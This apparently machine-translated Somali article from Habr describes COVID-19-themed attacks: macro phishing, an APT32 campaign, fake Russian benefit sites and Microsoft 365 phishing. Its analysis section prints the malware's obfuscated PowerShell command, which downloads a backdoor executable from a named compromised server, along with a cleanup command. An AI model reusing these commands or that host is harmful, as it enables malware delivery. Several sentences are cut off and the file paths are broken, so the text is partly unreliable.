Weeraryahanadu waxay sii wadaan ka faa'iidaysiga mawduuca COVID-19, iyaga oo u abuuraya hanjabaado badan iyo kuwa aad u xiisaynaya wax kasta oo la xidhiidha cudurka faafa. IN
Xusuusnow gudaha
Ma doonaysaa in lagaa baadho COVID-19 bilaash ah?
Tusaalaha kale ee muhiimka ah ee phishing-ku-maah-maaheedka coronavirus wuxuu ahaa
Ku qancinta isticmaaleyaasha badankood si ay awood ugu yeeshaan macros sidoo kale way fududahay. Si tan loo sameeyo, khiyaano caadi ah ayaa la isticmaalay: si aad u buuxiso su'aalaha, marka hore waxaad u baahan tahay inaad karti u yeelato macros, taas oo macnaheedu yahay inaad u baahan tahay inaad maamusho qoraalka VBA.
Sida aad arki karto, qoraalka VBA-da ayaa si gaar ah looga qariyey fayraska.
Daaqadaha waxay leedahay qaab sugitaan oo codsigu ku sugayo /T <ilbiriqsi> ka hor intaysan aqbalin jawaabta βHaaβ ee caadiga ah. Xaaladeena, qoraalka ayaa sugayay 65 ilbiriqsi ka hor inta aan la tirtirin faylasha ku meel gaarka ah:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Oo markii la sugayay, malware waa la soo dejiyay. Qoraal gaar ah oo PowerShell ah ayaa tan loo bilaabay:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Ka dib markii la go'aamiyo qiimaha Base64, qoraalka PowerShell wuxuu soo dejinayaa albaabka dambe ee ku yaal server-kii hore ee Jarmalka laga jabsaday:
http://automatischer-staubsauger.com/feature/777777.png
wuxuuna ku kaydiyaa magaca:
C:UsersPublictmpdirfile1.exe
folder βC:UsersPublictmpdirβ
waa la tirtiraa marka la wado faylka 'tmps1.bat' ee ka kooban amarka cmd /c mkdir ""C:UsersPublictmpdir"".
Weerar lala beegsaday hayβadaha dawladda
Intaa waxaa dheer, falanqeeyayaasha FireEye ayaa dhawaan sheegay weerar lala beegsaday APT32 oo loola dan lahaa dhismayaasha dawladda ee Wuhan, iyo sidoo kale Wasaaradda Maareynta Degdegga ah ee Shiinaha. Mid ka mid ah RTF-yada la qaybiyay ayaa ka koobnaa xiriirinta maqaalka New York Times ee cinwaankiisu yahay
Waxa xiisaha lihi leh, wakhtiga la ogaaday, mid ka mid ah antiviruses-yada lama helin tusaale ahaan, marka loo eego Virustotal.
Marka mareegaha rasmiga ah ay go'aan
Tusaalaha ugu yaabka badan ee weerarka phishing-ka ayaa ka dhacay Ruushka maalin dhaweyd. Sababta tani waxay ahayd magacaabista faa'iido muddo dheer la sugayay oo loogu talagalay carruurta da'doodu tahay 3 ilaa 16 sano. Markii bilawga aqbalaada codsiyada lagu dhawaaqay Maajo 12, 2020, malaayiin ayaa u yaacay shabakada Adeegyada Gobolka si ay u helaan caawimo la sugayay oo ay hoos u dhigeen marinka wax aan ka xumaanin weerar xirfadle DDoS ah. Markii uu madaxweynuhu sheegay in "Adeegyada Dawladdu ay la qabsan kari waayeen qulqulka codsiyada," dadku waxay bilaabeen inay khadka internetka ka hadlaan furitaanka goob kale oo lagu aqbalo codsiyada.
Dhibaatadu waxay tahay in dhowr goobood ay bilaabeen inay shaqeeyaan hal mar, iyo halka mid, kan dhabta ah ee posobie16.gosuslugi.ru, dhab ahaantii aqbala codsiyada, in ka badan
Asxaabta ka socota SearchInform waxay heleen ilaa 30 bogag cusub oo been abuur ah oo ku yaal aagga .ru. Infosecurity iyo Shirkadda Softline waxay la socdeen in ka badan 70 shabakadood oo adeeg dawladeed oo been abuur ah tan iyo bilowgii Abriil. Abuurayaashooda waxay adeegsadaan calaamado la yaqaan waxayna sidoo kale adeegsadaan isku dhafka erayada gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, iyo wixii la mid ah.
Hype iyo injineernimada bulshada
Tusaalooyinkan oo dhami waxay xaqiijinayaan kaliya in weeraryahannadu ay si guul leh u soo xareeyaan mawduuca coronavirus. Markasta oo ay sii korodho xiisadda bulsheed iyo arrimaha aan caddayn, fursadaha badan ee khiyaameeyayaashu waa inay xadaan xogta muhiimka ah, ku qasbaan dadka inay lacagtooda iska bixiyaan, ama si fudud u jabsadaan kombiyuutaro badan.
Oo marka la eego in masiibadani ay ku qasabtay dadka aan diyaarsaneyn inay ka shaqeeyaan guriga guud ahaan, kaliya maahan shaqsi ahaan, laakiin sidoo kale xogta shirkadu waa halis. Tusaale ahaan, dhawaan isticmaaleyaasha Microsoft 365 (oo hore u ahaan jiray Office 365) ayaa sidoo kale la kulmay weerar phishing ah. Dadku waxay heleen farriimo cod oo aad u weyn oo "la seegay" sida ku lifaaqan waraaqaha. Si kastaba ha ahaatee, faylalka ayaa dhab ahaantii ahaa bog HTML ah oo u soo diray dhibanayaasha weerarka
Source: www.habr.com